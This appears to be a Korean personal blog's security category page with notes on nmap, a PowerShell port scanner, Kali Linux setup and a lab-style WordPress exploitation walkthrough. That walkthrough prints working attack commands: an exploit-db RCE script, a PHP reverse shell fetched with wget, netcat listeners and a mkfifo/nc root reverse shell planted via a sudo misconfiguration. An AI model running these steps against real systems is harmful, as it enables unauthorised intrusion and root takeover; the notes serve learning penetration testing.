StoryCode

'보안, 해킹, Hacking, nmap, exploit'에 해당되는 글 5건

  1. nmap.Powershell.포트스캔(1...999).특정ip
  2. nmap.기본
  3. 2022-548.kalilinux.searchsploit.wordpress
  4. kalilinux.설치.Notebook
  5. kalilinux.설치.VMWare

nmap.Powershell.포트스캔(1...999).특정ip

보안, 해킹, Hacking, nmap, exploit
반응형

1...999 | ForEach-Object {
    $port = $_
    $tcpClient = New-Object System.Net.Sockets.TcpClient
    $connectTask = $tcpClient.BeginConnect("123.456.789.012", $port, $null, $null)
    $waitHandle = $connectTask.AsyncWaitHandle
    $result = $waitHandle.WaitOne(300) # 300 milliseconds = 0.3 seconds
    $waitHandle.Close()

    if ($result -eq $true) {
        $tcpClient.EndConnect($connectTask)
        Write-Output "Port $port is open."
    }
    else
    {
        Write-Output "Port $port is closed."
    }

    $tcpClient.Close()
}

반응형

'보안, 해킹, Hacking, nmap, exploit' 카테고리의 다른 글

nmap.기본  (0) 2022.11.18
2022-548.kalilinux.searchsploit.wordpress  (0) 2022.11.08
kalilinux.설치.Notebook  (0) 2022.11.01
kalilinux.설치.VMWare  (0) 2022.06.20

nmap.기본

보안, 해킹, Hacking, nmap, exploit
반응형

- 포트 스캔툴

- nmap.org

알려진 포트 스캔 nmap 192.168.11.10
포트 하나 스캔 nmap 192.168.11.10 -p 22
포트 전체 스캔 nmap 192.168.11.10 -p-
배너 그래빙 스캔
service 종류와 버전을 보여준다.
ex> 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
nmap 192.168.11.10 -sV
OS 스캔 (예측이지 정확한건 아님) nmap -O 192.168.11.10
Oracle Port
-Pn : Ping no
nmap -Pn -p 1521 192.168.11.10
STATE = filtered 면 Port Closed
   

 

# 참조 : https://hagsig.tistory.com/94

# 참조 : https://ctos-master.tistory.com/17

반응형

2022-548.kalilinux.searchsploit.wordpress

보안, 해킹, Hacking, nmap, exploit
반응형

# 1단계. 정보확인

nmap -sV ip # 포트 스캔

nmap -p- -sV ip # 전체 포트 스캔

 

searchsploit wordpress | grep -i "learndash" | grep -i ".py" # searchsploit 으로 해킹 가능 목록 검색. 특히 py 실행으로 콘솔획득 목표. grep RCE 로 Remote Code Execution 획득.

 

cp /usr/share/exploitdb/exploits/php/webapps/12345.py ./exploit.py # 12345.py 은 샘플

 

python exploit.py # 사용법부터 확인

 

python exploit.py http://192.168.11.10 # 사용법대로 실행. 192.168.11.10 은 해킹할 서버 ip. WebShell을 획득

> RCE $ ls

리스트....

> RCE $ id # 현재 일반 사용자. 루트 획득 필요.

uid=33( www-data ) gid=33( www-data ) groups=33( www-data )

 

 

# 2 단계. 악성 php reverse shell 올려서 실제 쉘 얻기

 

Local> google.php reverse shell.pentestmonkey/php-reverse-shell.php 로컬 다운로드후  php-reverse-shell.php 편집해서 ip를 로컬ip로, port 를 7777 로 수정후 저장

 

Local> python3 -m http.server 5555

 

WebShell> wget http://localhostip:5555/php-reverse-shell.php

> RCE $ ls

# php-reverse-shell.php # 이 파일이 보여야 함.

> RCE $ pwd

# 현재 위치 확인

 

Local> nc -nlvp 7777

# 서버에서 Local:7777 로 접속하기를 기다린다.

 

<Chrome> http://192.168.11.10/bootstrap/img/php-reverse-shell.php

# 서버에서 Local:7777 로 접속하게 하고, nc 가 터미널을 사용할 수 있도록 해준다.

 

nc$ python3 -c "import pty;pty.spawn('/bin/bash')"

# Local.nc.터미널 접속후, bash 획득하기

 

nc$ sudo -l # sudo 로 실행시 root 암호 묻지 않고 실행해주는 목록 확인

(ALL) NOPASSWD: /usr/bin/perl /home/user/backup.pl

 

nc$ cat /home/user/backup.pl # root 권한임

#! /usr/bin/perl

system("sh", "/etc/copy.sh");

 

nc$ cat /etc/copy.sh # backup.pl 로부터 상속받아 root 권한이 될수 있는게 copy.sh. 아래 내용을 copy.sh 에 넣어야 함.

# rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|bin/sh -i 2>&1|nc local내ip 4444 >/tmp/f

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|bin/sh -i 2>&1|nc local내ip 4444 >/tmp/f" > /etc/copy.sh

 

Local> nc -nlvp 4444

 

nc$ sudo /usr/bin/perl /home/user/backup.pl

반응형

'보안, 해킹, Hacking, nmap, exploit' 카테고리의 다른 글

nmap.Powershell.포트스캔(1...999).특정ip  (0) 2024.03.26
nmap.기본  (0) 2022.11.18
kalilinux.설치.Notebook  (0) 2022.11.01
kalilinux.설치.VMWare  (0) 2022.06.20

kalilinux.설치.Notebook

보안, 해킹, Hacking, nmap, exploit
반응형

1) Win Disk Imager 설치

https://sourceforge.net/projects/win32diskimager/

* Google Drive 종료시키야 Win Disk Imager 가 실행됨.

 

2) Kali ISO 다운로드

https://www.kali.org/downloads/

Installer Image > 64bit > Recommended

 

3) Win Disk Imager 로 Kali ISO 를 USB 에 Write 한 후, USB 부팅

 

4) 다른 건 그냥 넘어가는데, wifi 가 문제됨.

공유기에서 WPA PSK 는 안됨. WPA2 PSK 도 안됨.

"WPA/WPA2 mixed mode - PSK TKIP/AES mixed mode" 만 됨.

5) Continue...

 

6) /dev/sda

 

7) sudo apt-get update

sudo apt-get install ssh

sudo service ssh start

nmap localhost

sudo vim /etc/ssh/sshd_config

    PermitRootLogin yes #추가

sudo service ssh restart

# putty 접속 안됨 (이걸로도 안됨) : https://hack-cracker.tistory.com/207

# 유선 -> 공유기 -> 무선이 안되는 듯. ping 도 안감.

# 노트북에 무선밖에 없어서, USB 유선 구매해서 연결하니 바로 ssh 연결됨. ( connection refused 나면 ssh service 재시작해볼것 )

반응형

'보안, 해킹, Hacking, nmap, exploit' 카테고리의 다른 글

nmap.Powershell.포트스캔(1...999).특정ip  (0) 2024.03.26
nmap.기본  (0) 2022.11.18
2022-548.kalilinux.searchsploit.wordpress  (0) 2022.11.08
kalilinux.설치.VMWare  (0) 2022.06.20

kalilinux.설치.VMWare

보안, 해킹, Hacking, nmap, exploit
반응형

1. VMWare / VirtualBox

https://www.kali.org/get-kali/#kali-virtual-machines

 

2. VMWARE ( 2022-438.Kali.2022-2.SecurityTest )

다운로드 받은 파일 압축풀기

 

3.VMWARE 에서 Open하기

 

4. 시작후 kali / kali 로그인

 

# 참조 : https://wikidocs.net/91356

5.

~# apt-get update
~# apt-get install fcitx-hangul
~# apt-get install fcitx-lib*
~# apt-get install fonts-nanum*

init 6 # 리부팅

 

6. 좌측 상단 클릭후 Input Method 검색후 엔터 OK > YES > fcitx > OK

7.1.좌측 상단 클릭후 fcitx Configuration

Input Method Tab > "Only Show Current Language" Off > Hangul 검색 및 선택 > OK

7.2.

Global Config > Trigger Input Method 에서 "Ctrl + Space" + "Ralt" 나오게 하기.

이제 Ctrl + Space 나 Right Alt 누르면 한글입력이 가능해진다.

 

8.1

apt-get install lynis

 

 

9.1

> nmap 192.168.11.2 // post scan

 

9.2

> lynis audit system # 로컬 시스템 검사 보고서 출력

> lynix audit system remote 192.168.11.2 # 원격 시스템 검사 보고서 출력

반응형